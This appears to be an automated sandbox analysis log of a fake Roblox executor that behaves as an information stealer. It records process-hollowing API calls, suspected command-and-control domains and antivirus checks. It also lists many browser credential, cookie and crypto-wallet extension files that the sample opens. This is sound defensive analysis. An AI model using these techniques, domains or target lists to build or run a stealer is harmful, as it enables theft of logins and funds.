                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 0_2_0032019E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_0032019E
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeMemory written: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: Solara-Roblox-Executor-v3.exe, 00000000.00000002.2024667053.000000000294B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: cloudewahsj.shop
                Source: Solara-Roblox-Executor-v3.exe, 00000000.00000002.2024667053.000000000294B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rabidcowse.shop
                Source: Solara-Roblox-Executor-v3.exe, 00000000.00000002.2024667053.000000000294B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: noisycuttej.shop
                Source: Solara-Roblox-Executor-v3.exe, 00000000.00000002.2024667053.000000000294B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: tirepublicerj.shop
                Source: Solara-Roblox-Executor-v3.exe, 00000000.00000002.2024667053.000000000294B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: framekgirus.shop
                Source: Solara-Roblox-Executor-v3.exe, 00000000.00000002.2024667053.000000000294B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wholersorie.shop
                Source: Solara-Roblox-Executor-v3.exe, 00000000.00000002.2024667053.000000000294B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: abruptyopsn.shop
                Source: Solara-Roblox-Executor-v3.exe, 00000000.00000002.2024667053.000000000294B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: nearycrepso.shop
                Source: Solara-Roblox-Executor-v3.exe, 00000000.00000002.2024667053.000000000294B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: fancywaxxers.shop
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeProcess created: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe "C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeProcess created: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe "C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeProcess created: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe "C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeProcess created: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe "C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: EnumSystemLocalesW,0_2_003068FD
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: EnumSystemLocalesW,0_2_0030B0C5
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: GetLocaleInfoW,0_2_0030B110
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0030B1B7
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0030AA37
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: GetLocaleInfoW,0_2_0030B2BD
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: GetLocaleInfoW,0_2_003063F5
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: EnumSystemLocalesW,0_2_0030AC88
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0030AD30
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: EnumSystemLocalesW,0_2_0030AF83
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: GetLocaleInfoW,0_2_0030AFF0
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: EnumSystemLocalesW,3_2_003068FD
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: EnumSystemLocalesW,3_2_0030B0C5
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: GetLocaleInfoW,3_2_0030B110
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_0030B1B7
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_0030AA37
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: GetLocaleInfoW,3_2_0030B2BD
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: GetLocaleInfoW,3_2_003063F5
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: EnumSystemLocalesW,3_2_0030AC88
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_0030AD30
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: EnumSystemLocalesW,3_2_0030AF83
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: GetLocaleInfoW,3_2_0030AFF0
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 0_2_002FA335 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_002FA335
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2105519914.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2114533870.0000000005809000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145880192.0000000005809000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2105519914.0000000002FAF000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2140842466.000000000580A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: Solara-Roblox-Executor-v3.exe PID: 2828, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2105519914.0000000002FC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum-LTC\wallets
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2105519914.0000000002FC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2093749347.0000000003016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: lmjkfcffne","ez":"Jaxx Liberty"},{"en":"fihkakfo
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2093473590.0000000002FC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2105519914.0000000002FC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3,
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2105519914.0000000002FC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2093473590.0000000002FAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2093473590.0000000002FAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
